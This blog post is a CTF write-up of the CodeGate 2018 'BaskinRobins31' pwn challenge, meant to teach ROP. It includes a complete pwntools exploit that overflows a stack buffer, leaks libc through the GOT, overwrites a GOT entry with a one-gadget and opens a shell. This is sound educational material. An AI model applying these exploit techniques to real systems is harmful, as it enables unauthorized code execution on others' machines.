CodeGate 2018 PWN BaskinRobins Write-up

Introduction

Finally come back from Spring Festival vacation. Since I think Readme-revenge is not a typical example on ROP attack. I think I can use the easiest challenge in CodeGate 2018 to demonstrate the usage of ROP attack.

Vulnerability Analysis

ASLR and stack canary is not enabled in the binary. Furthermore, there is an obvious stack buffer overflow in function your_turn.

Exploit Plan

The exploit is divided into two parts: (l)Leak the libc version via constructing ROP chain to read function pointer in GOT. (2)Construct ROP to use read to overwrite function pointer in GOT to magic gadget.

Exploit

from pwn import *

DEBUG = int(sys.argv[1]);

if(DEBUG == 0):
    r = remote("ch41l3ng3s.codegate.kr", 3131);
elif(DEBUG == 1):
    r = process("./BaskinRobins31");
elif(DEBUG == 2):
    r = process("./BaskinRobins31");
    gdb.attach(r, '''source ./script''');

def exploit():
    helper = 0x40087a;
    junk = 0x424242424242;
    payload = "A"*0xb0;

    payload += p64(0x6020b8);
    payload += p64(helper);
    payload += p64(0) + p64(0x6020c0) + p64(0x80) + p64(0x4008f4);
    payload += p64(junk) * 20;

    r.recvuntil("(1-3)");
    r.send(payload);

    time.sleep(2);
    payload2 = p64(helper);
    payload2 += p64(0) + p64(0x602028) + p64(0x8) + p64(0x400bbb);
    payload2 += p64(0x6020c0) + p64(0x414141414141)*4;
    payload2 += p64(0x4008f4);
    r.send(payload2);

    r.recvuntil(":(");
    r.recv(2);

    leakValue1 = u64(r.recv(8));
    leakValue2 = u64(r.recv(8));
    leakValue3 = u64(r.recv(8));
    leakValue4 = u64(r.recv(8));
    leakValue5 = u64(r.recv(8));
    leakValue6 = u64(r.recv(8));
    leakValue7 = u64(r.recv(8));
    leakValue8 = u64(r.recv(8));
    leakValue9 = u64(r.recv(8));

    log.info("0x%x", leakValue6);
    log.info("0x%x", leakValue7);
    log.info("0x%x", leakValue8);
    log.info("0x%x", leakValue9);

    libcBase = leakValue8 - 0xf7250;
    log.info("Libc Base: 0x%x", libcBase);

    oneGadget = libcBase + 0xf1147;
    payload3 = p64(oneGadget);
    r.send(payload3);

    r.interactive();

exploit();

Conclusion

It’s not a difficult but typical ROP challenge. Since Readme-revenge in 34C3 is like a riddle, I take this challenge as an example on ROP attack.

Advertisements
Categories: pwn

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

w

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.